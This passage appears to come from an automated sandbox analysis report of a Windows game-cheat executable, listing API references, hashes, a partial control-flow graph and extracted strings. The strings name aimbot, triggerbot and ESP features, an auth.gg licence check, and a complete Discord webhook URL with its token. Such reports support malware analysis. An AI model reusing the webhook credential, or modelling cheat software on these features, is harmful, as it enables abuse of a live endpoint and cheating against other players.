                                                                                                                                                                        • GetAsyncKeyState.USER32 ref: 00007FF78661B323
                                                                                                                                                                          • Part of subcall function 00007FF7865F3190: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F31F3
                                                                                                                                                                          • Part of subcall function 00007FF7865F3190: memcpy.VCRUNTIME140 ref: 00007FF7865F3213
                                                                                                                                                                          • Part of subcall function 00007FF7865F3190: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3233
                                                                                                                                                                          • Part of subcall function 00007FF78661A3E0: CreateThread.KERNEL32 ref: 00007FF78661A4CA
                                                                                                                                                                          • Part of subcall function 00007FF78661A3E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661A505
                                                                                                                                                                        • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661CE90
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661D11D
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E8F8
                                                                                                                                                                          • Part of subcall function 00007FF786613980: memset.VCRUNTIME140 ref: 00007FF7866139B0
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A00
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A12
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A24
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A36
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A48
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A5A
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A6C
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A7E
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A90
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AA2
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613AB4
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AC6
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AD8
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AEA
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AFC
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B0E
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B20
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B32
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B44
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B56
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B68
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B7A
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B8C
                                                                                                                                                                          • Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF786613B9E
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661D1BD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??5?$basic_istream@D@std@@@std@@U?$char_traits@V01@$_invalid_parameter_noinfo_noreturn$memcpy$AsyncCreateStateThreadexitfreemallocmemset
                                                                                                                                                                        • String ID: ##Main$##Main1$##Mains$%.0f$%.3f$(AIR STUCK)RISKY FEATURE:$@$Aimbot$Air Stuck$Box$Combat$Config$Corner$Distance$Draw Filled$Filled Fov$Fov Arrows$Fov Circle$Fov Size$Hitbox$Legit Config$Load Config$Misc$Options$Orqur Public$Prediction$Prediction $Prediction $Prediction $Rage Config$Rank$Render Count$Rifle Fov$Rifle Settings$Rifle Smooth$SMG Fov$SMG Settings$SMG Smooth$Save Config$Save/Load$Semi Config$Shotgun Fov$Shotgun Settings$Shotgun Smooth$Skeleton$Smoothing$Snapline$Sniper Fov$Sniper Settings$Sniper Smooth$Triggerbot$Triggerbot Delay (ms)$Triggerbot Distance (m)$Unload$Username$Visuals$Weapon$Weapon config$config.json
                                                                                                                                                                        • API String ID: 2312794053-2218353132
                                                                                                                                                                        • Opcode ID: 0a19ecf719c1dfd3bf793fa95b1914837c7ac2961284981cd9f9382218341917
                                                                                                                                                                        • Instruction ID: 3c680e6bd0af139f24d6c8fcbbaf64e884ff656fb1e7a680d181db22455e17a5
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a19ecf719c1dfd3bf793fa95b1914837c7ac2961284981cd9f9382218341917
                                                                                                                                                                        • Instruction Fuzzy Hash: 2023E772A08AC6E6E700EB25D8412EEB761FB99744FA58332DA4C57265DF7CE484CF10
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E8F8
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E998
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78661E9B6
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E975
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618D04
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618D45
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618D86
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618DC5
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618E04
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618E43
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618E82
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618EC1
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618F00
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618F3F
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618F7E
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618FC3
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619008
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661904D
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619092
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866190D7
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661911C
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619161
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866191A6
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866191EB
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619230
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619275
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866192BA
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866192FF
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619344
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619389
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866193CE
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619413
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619458
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661949D
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866194E2
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619527
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661956C
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866195B1
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866195F6
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661963B
                                                                                                                                                                          • Part of subcall function 00007FF786629810: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF786612701), ref: 00007FF786629868
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619680
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866196C5
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661970A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy$Concurrency::cancel_current_task
                                                                                                                                                                        • String ID: https://auth.gg/$https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOfglnFe9ULMgnrQPphdYlK$success
                                                                                                                                                                        • API String ID: 73660495-2681837100
                                                                                                                                                                        • Opcode ID: dcae76f5e32a18d61bceb1a6437418df6aa16e57f095c71ef11884fea2810160
                                                                                                                                                                        • Instruction ID: 2c830dc6914f601f8187b3ce1e75156bca642f08d9d0068897cf56abef8499c5
                                                                                                                                                                        • Opcode Fuzzy Hash: dcae76f5e32a18d61bceb1a6437418df6aa16e57f095c71ef11884fea2810160
                                                                                                                                                                        • Instruction Fuzzy Hash: 0913A792F55BC6A4E720EB31CC413FA5312BBD7784FA06722E51C5659AEF68BAC0C710
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Champion
                                                                                                                                                                        • API String ID: 3063020102-3157597410
                                                                                                                                                                        • Opcode ID: 7576d94f8d19b4e8bdeb02c2ab4e3e49e2d77fe90305fda597ce966d4870b5ec
                                                                                                                                                                        • Instruction ID: 3e56b4467c982d97c85810596f167bf2133c3961875bc17cb2bd25c36e5d7b79
                                                                                                                                                                        • Opcode Fuzzy Hash: 7576d94f8d19b4e8bdeb02c2ab4e3e49e2d77fe90305fda597ce966d4870b5ec
                                                                                                                                                                        • Instruction Fuzzy Hash: 9282F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Unreal
                                                                                                                                                                        • API String ID: 3063020102-2085349250
                                                                                                                                                                        • Opcode ID: 6db129ba88c9718cc147c139c98e57828e82a25babb38257369463ddc4933334
                                                                                                                                                                        • Instruction ID: 2f675d1c46336fa327df141c0caf6b87c4c8559b084e9702064857ed9722a728
                                                                                                                                                                        • Opcode Fuzzy Hash: 6db129ba88c9718cc147c139c98e57828e82a25babb38257369463ddc4933334
                                                                                                                                                                        • Instruction Fuzzy Hash: 1382F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Elite
                                                                                                                                                                        • API String ID: 3063020102-374124821
                                                                                                                                                                        • Opcode ID: 660a1ce2e6335bd4480a4496a6320cfbd420d9b93cafddfcba0e3ef48deea494
                                                                                                                                                                        • Instruction ID: 8ab33002e822933838c75ddce01c85ded572735295aaebec5ee7b2e44b721106
                                                                                                                                                                        • Opcode Fuzzy Hash: 660a1ce2e6335bd4480a4496a6320cfbd420d9b93cafddfcba0e3ef48deea494
                                                                                                                                                                        • Instruction Fuzzy Hash: F6820522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Gold 1
                                                                                                                                                                        • API String ID: 3063020102-1116304436
                                                                                                                                                                        • Opcode ID: 13633dc04bd729b73bfad360e359c40cbbcf0cbe51484844261775a988218832
                                                                                                                                                                        • Instruction ID: 3bb80fc75c1ad476e608d8097e4ace97f341dfa7079dd7c6f7e660ce0a7c5166
                                                                                                                                                                        • Opcode Fuzzy Hash: 13633dc04bd729b73bfad360e359c40cbbcf0cbe51484844261775a988218832
                                                                                                                                                                        • Instruction Fuzzy Hash: AA82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Silver 3
                                                                                                                                                                        • API String ID: 3063020102-3638036111
                                                                                                                                                                        • Opcode ID: 382705a7a427e8fc6eb42cf50dfd285abcf2769609dd69745f8275aef3853014
                                                                                                                                                                        • Instruction ID: 08e1d8de58bc87c9ff0aa822147222c2e7742412e53b3f607e9fc336840e41ca
                                                                                                                                                                        • Opcode Fuzzy Hash: 382705a7a427e8fc6eb42cf50dfd285abcf2769609dd69745f8275aef3853014
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2430 7ff786622667-7ff78662283f call 7ff786629f30 call 7ff7865e2c40 2439 7ff7866228e6-7ff7866228fb 2430->2439 2440 7ff786622845-7ff78662284c 2430->2440 2441 7ff78662292e-7ff786622964 call 7ff78661e8c0 2439->2441 2442 7ff7866228fd-7ff78662290b 2439->2442 2443 7ff786622850-7ff786622858 2440->2443 2454 7ff78662296a-7ff786622987 call 7ff786612530 2441->2454 2455 7ff7866229f6-7ff786622a03 2441->2455 2444 7ff78662290d-7ff786622920 2442->2444 2445 7ff786622926-7ff786622929 call 7ff78662cdc0 2442->2445 2443->2443 2447 7ff78662285a-7ff786622860 2443->2447 2444->2445 2448 7ff786623557-7ff78662355d _invalid_parameter_noinfo_noreturn 2444->2448 2445->2441 2447->2439 2451 7ff786622866-7ff7866228df call 7ff786601a40 2447->2451 2453 7ff78662355e-7ff786623564 _invalid_parameter_noinfo_noreturn 2448->2453 2451->2439 2459 7ff786623565-7ff78662356b _invalid_parameter_noinfo_noreturn 2453->2459 2468 7ff786622989 2454->2468 2469 7ff78662298c-7ff7866229a7 call 7ff786629e80 2454->2469 2457 7ff786622a09-7ff786622a1d 2455->2457 2458 7ff786622e4b-7ff786622f02 call 7ff7865e2c40 call 7ff7865fe250 2455->2458 2466 7ff786622a20-7ff786622a48 2457->2466 2490 7ff786622f08-7ff78662311c sinf cosf atan2f sinf cosf sinf cosf sinf cosf sinf cosf call 7ff78662a4b0 * 2 call 7ff7865e2c40 2458->2490 2491 7ff78662337d-7ff7866233ea pow * 2 2458->2491 2463 7ff78662356c-7ff786623572 _invalid_parameter_noinfo_noreturn 2459->2463 2467 7ff786623573-7ff786623579 _invalid_parameter_noinfo_noreturn 2463->2467 2466->2466 2471 7ff786622a4a-7ff786622be8 call 7ff78662bc70 memcpy * 3 call 7ff786629e80 2466->2471 2472 7ff78662357a-7ff786623580 _invalid_parameter_noinfo_noreturn 2467->2472 2468->2469 2479 7ff7866229a9-7ff7866229bd 2469->2479 2480 7ff7866229dd-7ff7866229ef 2469->2480 2534 7ff786622bea-7ff786622bfe 2471->2534 2535 7ff786622c1e-7ff786622c3f 2471->2535 2477 7ff786623581-7ff786623587 _invalid_parameter_noinfo_noreturn 2472->2477 2478 7ff786623588-7ff78662358e _invalid_parameter_noinfo_noreturn 2477->2478 2483 7ff78662358f-7ff78662359f call 7ff78662cdc0 2478->2483 2484 7ff7866229d8 call 7ff78662cdc0 2479->2484 2485 7ff7866229bf-7ff7866229d2 2479->2485 2480->2455 2498 7ff7866235a6-7ff7866235b0 2483->2498 2484->2480 2485->2453 2485->2484 2538 7ff786623258-7ff7866232dc call 7ff786611200 call 7ff786629870 call 7ff7866111a0 2490->2538 2539 7ff786623122-7ff786623132 2490->2539 2504 7ff7866233ec-7ff7866233fb 2491->2504 2505 